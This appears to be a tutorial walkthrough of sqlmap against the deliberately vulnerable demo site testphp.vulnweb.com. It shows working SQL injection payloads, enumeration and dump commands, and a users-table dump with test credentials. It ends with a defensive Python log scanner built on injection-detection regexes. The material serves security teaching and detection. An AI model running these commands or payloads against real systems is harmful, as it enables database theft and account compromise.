[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:00:45
[19:00:45] [INFO] resuming back-end DBMS 'mysql' 
[19:00:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 9252=9252
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: cat=1 AND (SELECT 5744 FROM(SELECT COUNT(*),CONCAT(0x7162786b71,(SELECT (ELT(5744=5744,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT CONCAT(0x7162786b71,0x4b6475656744465a615a6771444655737244686a494f66776a786776626e75777879454a77486562,0x7176626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Bnnk
---
[19:00:46] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0
[19:00:46] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema
[19:00:46] [INFO] fetching tables for database: 'acuart'
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+
[19:00:46] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 19:00:46

8 tables were identified, named artists, carts, categ, featured, guestbook, pictures, products, users.

Let's look at the columns of the users table.
root@Kali2018-4:~# sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs -D acuart -T users --columns
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.2.10#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:07:36

[19:07:36] [INFO] resuming back-end DBMS 'mysql'
[19:07:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=1 AND 9252=9252

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cat=1 AND (SELECT 5744 FROM(SELECT COUNT(*),CONCAT(0x7162786b71,(SELECT (ELT(5744=5744,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: cat=1 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: cat=1 UNION ALL SELECT CONCAT(0x7162786b71,0x4b6475656744465a615a6771444655737244686a494f66776a786776626e75777879454a77486562,0x7176626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Bnnk
---
[19:07:39] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0
[19:07:39] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema

[19:07:39] [INFO] fetching columns for table 'users' in database 'acuart'
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

[19:07:39] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 19:07:39

8 columns were identified, with the following names:
address, cart, cc, email, name, pass, phone, uname.
Let's look at the data in each column. What we mainly want is the username and password to log in to the application, since we already know there is a users table and that it contains uname and pass.
root@Kali2018-4:~# sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs -D acuart -T users -C address,cart,cc,email,name,pass,phone,uname --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.2.10#stable}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:16:43
[19:16:43] [INFO] resuming back-end DBMS 'mysql' 
[19:16:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 9252=9252
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: cat=1 AND (SELECT 5744 FROM(SELECT COUNT(*),CONCAT(0x7162786b71,(SELECT (ELT(5744=5744,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT CONCAT(0x7162786b71,0x4b6475656744465a615a6771444655737244686a494f66776a786776626e75777879454a77486562,0x7176626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Bnnk
---
[19:16:44] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0
[19:16:44] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema
[19:16:44] [INFO] fetching entries of column(s) 'address, cart, cc, email, name, pass, phone, uname' for table 'users' in database 'acuart'
[19:16:44] [INFO] recognized possible password hashes in column 'cart'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] do you want to crack them via a dictionary-based attack? [Y/n/q] [19:19:59] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> [19:20:25] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] [19:20:34] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[19:20:34] [INFO] starting 4 processes 
[19:20:34] [INFO] current status: =-=-=... |
[19:20:34] [INFO] current status: ;    ... |
[19:20:34] [INFO] current status: !#%&*... /
[19:20:34] [INFO] current status: ........ -
[19:20:51] [INFO] current status: zz836... \
[19:20:51] [INFO] current status: ZzDxg... |
[19:20:51] [INFO] current status: zzl57... |
[19:20:51] [INFO] current status: zzQLx... /
[19:20:51] [INFO] current status: zzubb... -
[19:20:51] [INFO] current status: zzz1p... \
[19:20:51] [INFO] current status: zzzzz... |[19:20:52] [WARNING] no clear password(s) found
Database: acuart
Table: users
[1 entry]
+---------------------------------------------------------------------------------------------------------------+----------------------------------+--------------------------+---------------------------+-------------------+------+---------+-------+
| address                                                                                                       | cart                             | cc                       | email                     | name              | pass | phone   | uname |
+---------------------------------------------------------------------------------------------------------------+----------------------------------+--------------------------+---------------------------+-------------------+------+---------+-------+
| LAMMERS IDIOTAS KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK\r\n<script>alert("LAMMER LIXO")</script> | 7dc9c50b4891e22263bca11a0ce717bf | TUDO LAMMER USANDO HAVIJ | TUDO LAMMER USANDO SQLMAP | aaaaaaaaaaaaaaaaa | test | <blank> | test  |
+---------------------------------------------------------------------------------------------------------------+----------------------------------+--------------------------+---------------------------+-------------------+------+---------+-------+
[19:20:52] [INFO] table 'acuart.users' dumped to CSV file '/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[19:20:52] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 19:20:52

As you can see, some data from the users table was returned, which made it possible to locate the application's username and password.

With the username "test" and password "test", it will be possible to log in to the application through this link: "http://testphp.vulnweb.com/login.php".
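From the defender's side, the four injection techniques sqlmap reported for the `cat` parameter (boolean-based, error-based with FLOOR/RAND, time-based with SLEEP, and UNION) leave recognisable traces in the web server's access log. The following example, written for this article and not part of sqlmap or the Vulnweb site, runs simple signatures over constructed log lines in combined log format; the IP address, date and sample requests are made up.

```python
"""Flag sqlmap-style probe patterns in web-server access log lines."""
import re
from urllib.parse import parse_qsl, urlsplit

# One signature per injection type listed in the sqlmap session above.
# These are coarse heuristics for triage; parameterised queries in the
# application are the real fix, detection only tells you someone is probing.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "error-based (FLOOR/RAND)": re.compile(r"FLOOR\s*\(\s*RAND\s*\(", re.I),
    "time-based blind": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
    "UNION query": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
}

# Captures the request target ("/path?query") from a combined-format line.
REQUEST_TARGET = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

# Constructed sample lines, not real traffic; payloads mirror the ones sqlmap used.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2018:19:16:43 -0300] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Jan/2018:19:16:43 -0300] "GET /listproducts.php?cat=1%20AND%209252%3D9252 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Jan/2018:19:16:44 -0300] "GET /listproducts.php?cat=1%20AND%20SLEEP(5) HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Jan/2018:19:16:44 -0300] "GET /listproducts.php?cat=1%20UNION%20ALL%20SELECT%20NULL,NULL--%20Bnnk HTTP/1.1" 200 9000',
    '203.0.113.5 - - [01/Jan/2018:19:16:44 -0300] "GET /listproducts.php?cat=1%20AND%20(SELECT%205744%20FROM(SELECT%20COUNT(*),FLOOR(RAND(0)*2))x%20GROUP%20BY%20x)a HTTP/1.1" 500 300',
]


def classify_request(target):
    """Return (parameter, signature) pairs for every query value that matches."""
    hits = []
    # parse_qsl percent-decodes values, so "AND%209252%3D9252" becomes "AND 9252=9252".
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for label, pattern in SIGNATURES.items():
            if pattern.search(value):
                hits.append((name, label))
    return hits


def scan_log(lines):
    """Scan access-log lines and return the (parameter, signature) findings in order."""
    findings = []
    for line in lines:
        match = REQUEST_TARGET.search(line)
        if match:
            findings.extend(classify_request(match.group(1)))
    return findings


if __name__ == "__main__":
    for param, label in scan_log(SAMPLE_LOG):
        print(f"parameter {param!r}: {label}")
```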
